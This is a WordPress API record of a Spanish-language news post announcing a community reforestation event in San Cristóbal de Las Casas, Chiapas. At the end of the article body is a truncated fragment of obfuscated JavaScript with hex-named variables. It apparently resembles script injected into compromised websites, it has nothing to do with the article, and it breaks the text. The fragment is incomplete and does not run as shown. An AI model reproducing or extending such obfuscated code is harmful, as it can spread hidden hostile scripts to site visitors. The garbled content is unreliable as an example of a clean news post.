{"id":22506,"date":"2025-06-19T05:14:21","date_gmt":"2025-06-19T05:14:21","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22506"},"modified":"2025-06-19T05:14:22","modified_gmt":"2025-06-19T05:14:22","slug":"convocan-a-jornada-de-reforestacion-en-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22506","title":{"rendered":"Convocan a jornada de reforestaci\u00f3n en SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"629\" height=\"816\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177819.jpg\" alt=\"\" class=\"wp-image-22507\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177819.jpg 629w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000177819-231x300.jpg 231w\" sizes=\"auto, (max-width: 629px) 100vw, 629px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ corresponsal<br>18 de junio del 2025. San Crist\u00f3bal de Las Casas.- Con el prop\u00f3sito de promover la conciencia ambiental y fortalecer el compromiso ciudadano con el entorno natural, Celeste Coello Armas convoc\u00f3 a la poblaci\u00f3n a sumarse a una jornada de reforestaci\u00f3n que se realizar\u00e1 el pr\u00f3ximo s\u00e1bado 22 de junio a las 8 de la ma\u00f1ana.<\/p>\n\n\n\n<p>La actividad, organizada en conjunto con la asociaci\u00f3n civil Tu Bosque A.C. y la agencia Tribu Publicidad, tendr\u00e1 como punto de encuentro la entrada del Colegio La Salle, desde donde se dar\u00e1 inicio a la plantaci\u00f3n de \u00e1rboles como parte de los esfuerzos por recuperar zonas verdes de la regi\u00f3n.<\/p>\n\n\n\n<p>En esta edici\u00f3n se contar\u00e1 con la participaci\u00f3n de diversos colectivos juveniles que se han destacado por su labor en temas sociales y ambientales. Entre ellos se encuentran Provida Animal JDCA A.C., Grupo Universitario Iuris Factum, Colectivo Los Extra\u00f1os y la Red de J\u00f3venes Pol\u00edticos de Chiapas, agrupaciones que han respondido al llamado de acci\u00f3n impulsado por Coello Armas.<\/p>\n\n\n\n<p>\u201cLa conservaci\u00f3n del medio ambiente es responsabilidad de todos; peque\u00f1as acciones pueden generar grandes cambios\u201d, se\u00f1al\u00f3 la convocante, quien ha impulsado distintas iniciativas de trabajo comunitario enfocadas en el cuidado ecol\u00f3gico.<\/p>\n\n\n\n<p>La invitaci\u00f3n est\u00e1 abierta a todas las personas interesadas en contribuir con esta causa, sin distinci\u00f3n de edad o experiencia. Los organizadores recomiendan llevar ropa c\u00f3moda, agua y herramientas b\u00e1sicas para la siembra.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ corresponsal18 de junio del 2025. San Crist\u00f3bal de Las Casas.- Con el prop\u00f3sito de promover la conciencia ambiental y fortalecer el compromiso ciudadano con el entorno natural, Celeste Coello Armas convoc\u00f3 a la poblaci\u00f3n a sumarse a una jornada de reforestaci\u00f3n que se realizar\u00e1 el pr\u00f3ximo s\u00e1bado 22 de junio a las 8 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22507,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-22506","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22506","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22506"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22506\/revisions"}],"predecessor-version":[{"id":22508,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22506\/revisions\/22508"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22507"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22506"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22506"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22506"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}